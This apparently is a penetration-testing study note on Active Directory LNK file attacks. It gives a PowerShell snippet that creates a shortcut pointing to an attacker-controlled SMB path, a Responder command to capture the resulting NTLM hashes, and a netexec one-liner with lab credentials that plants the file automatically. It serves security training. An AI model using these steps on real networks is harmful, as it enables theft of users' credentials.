// notes/ Active Directory
🏛️

Post Compromise Attacks Lnk File Attacks

A LNK File Attack is a type of [watering hole attack](https://www.techtarget.com/searchsecurity/definition/watering-hole-attack) that is done by creating a malicious file that poi…

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-attacks_lnk-file-attacks

LNK File Attacks

A LNK File Attack is a type of watering hole attack that is done by creating a malicious file that points back to us, placing it inside of shared folder and then waiting for hashes to fly into Responder.

Manual Attack Setup

Inside of an elevated PowerShell shell create the malicious file

powershell
$$objShell = New-Object -ComObject WScript.shell
$$lnk = $objShell.CreateShortcut("C:\evil.lnk")
$$lnk.TargetPath = "\\<YOUR-IP>\@evil.png"
$$lnk.WindowStyle = 1
$$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$$lnk.Description = "evil"
$$lnk.HotKey = "Ctrl+Alt+T"
$$lnk.Save()

Save the file with an @ symbol at beginning of the name so it loads at the top of the share

Run Responder

bash
$sudo responder -I eth0 -dwv

Automated Attack via Netexec

bash
$netexec smb 192.168.138.132 -d pnpt.local -u greg -p Password1 -M slinky -o NAME=evil SERVER=192.168.138.149